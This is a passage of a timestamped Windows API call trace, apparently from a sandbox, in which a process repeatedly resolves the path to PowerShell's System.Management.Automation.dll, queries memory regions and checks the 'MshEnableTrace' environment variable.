returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.801] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.802] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.802] CoTaskMemFree (pv=0x10c990) [0136.807] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.831] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.831] CoTaskMemFree (pv=0x10c990) [0136.833] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.833] CoTaskMemFree (pv=0x10c990) [0136.834] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.834] CoTaskMemFree (pv=0x10c990) [0136.838] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.838] CoTaskMemFree (pv=0x10c990) [0136.844] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.845] CoTaskMemFree (pv=0x10c990) [0136.845] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.846] CoTaskMemFree (pv=0x10c990) [0136.853] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.854] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0137.172] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0137.198] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0137.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.198] CoTaskMemFree (pv=0x10c990) [0137.785] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x10cdd0 [0138.187] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.347] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.356] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.357] VirtualQuery (in: lpAddress=0xca200, lpBuffer=0xcb0c0, dwLength=0x30 | out: lpBuffer=0xcb0c0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.484] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.484] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.484] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.485] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.485] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.485] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.486] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0138.487] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 